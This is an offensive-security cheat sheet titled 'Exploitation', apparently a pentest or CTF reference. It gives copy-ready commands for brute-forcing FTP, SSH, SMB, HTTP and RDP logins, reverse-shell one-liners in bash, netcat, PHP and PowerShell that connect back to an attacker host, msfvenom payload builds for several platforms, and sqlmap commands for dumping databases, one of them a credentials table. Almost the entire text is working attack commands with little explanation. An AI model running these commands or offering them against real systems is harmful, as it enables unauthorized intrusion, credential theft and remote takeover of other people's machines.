
Exploitation

Brute-Forcing

# Brute-Force FTP With Hydra
hydra -L <users.txt> -P <passwords.txt> ftp://<ip>

# Brute-Force SSH With Hydra
hydra -L <users.txt> -P <passwords.txt> ssh://<ip>

# Brute-Force SMB With CrackMapExec
cme smb <ip> -u <users.txt> -p <passwords.txt> --shares

# Brute-Force SMB With Hydra
hydra -L <users.txt> -P <passwords.txt> smb://<ip>

# Brute-Force HTTP With Hydra (note: `-L` takes a user list file, lowercase `-l` takes a single username)
(GET REQUEST) hydra -L <users.txt> -P <passwords.txt> <ip> http-get /<login>
(POST REQUEST) hydra -l <users.txt> -P <passwords.txt> <ip> http-post-form "/<login>:user=^USER^&pass=^PASS^:F=Incorrect"

# Brute-Force RDP With Hydra
hydra -L <users.txt> -P <passwords.txt> rdp://<ip>

Look for Vulnerabilities

# Search for known vulnerabilities (CVEs) by service and version
searchsploit <Service> <Version>
# Search Metasploit modules for the service and version
service postgresql start && msfconsole
...
search <service> <version>

Reverse Shells

# Bash Reverse Shell (Linux)
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

# Netcat Reverse Shell (requires a netcat build that supports the -e option)
nc -e /bin/bash <attacker_ip> <port>

# PHP Reverse Shell (command injection or file upload)
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell Reverse Shell (Windows)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}

# Bash reverse shell sent through a web shell (URL-encoded form: %26 is &)
bash -c "bash -i >%26 /dev/tcp/<ip>/<port> 0>%261"

# Listener (run on the attacker-side host before launching the shell)
nc -lvnp <port>

# Upgrade to full TTY (Linux)
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg
export TERM=xterm

Msfvenom Payloads

# Generate Linux Reverse Shell ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f elf > shell.elf

# Generate Windows Reverse Shell EXE
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f exe > shell.exe

# PHP Reverse Shell one-liner (not msfvenom; same as the entry in Reverse Shells above)
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

# Generate ASP Reverse Shell (for IIS)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f asp > shell.asp

# Generate WAR Reverse Shell (for Apache Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f war > shell.war

# Generate PowerShell Reverse Shell (as .ps1)
msfvenom -p windows/powershell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f psh > shell.ps1

# Generate Java Reverse Shell (JAR)
msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f jar > shell.jar

# List available payloads and other modules
msfvenom -l

SQL Injection with sqlmap

# Detect SQL Injection in a URL
sqlmap -u "http://<ip>/page.php?id=1" --batch --level=3 --risk=2

# Test a POST login form for injection and enumerate databases
sqlmap -u "http://<ip>/login.php" --data="username=admin&password=admin" --batch --dbs

# List databases
sqlmap -u "http://<ip>/?id=1" --batch --dbs

# List tables from a specific DB
sqlmap -u "http://<ip>/?id=1" --batch -D <database_name> --tables

# Dump data from a table
sqlmap -u "http://<ip>/?id=1" --batch -D <database_name> -T <table_name> --dump

# Dump a credentials table (example database and table names)
sqlmap -u "http://<ip>/?id=1" --batch -D users -T credentials --dump

# Send a session cookie with the injection requests
sqlmap -u "http://<ip>/page.php?id=1" --cookie="PHPSESSID=abcd1234" --batch
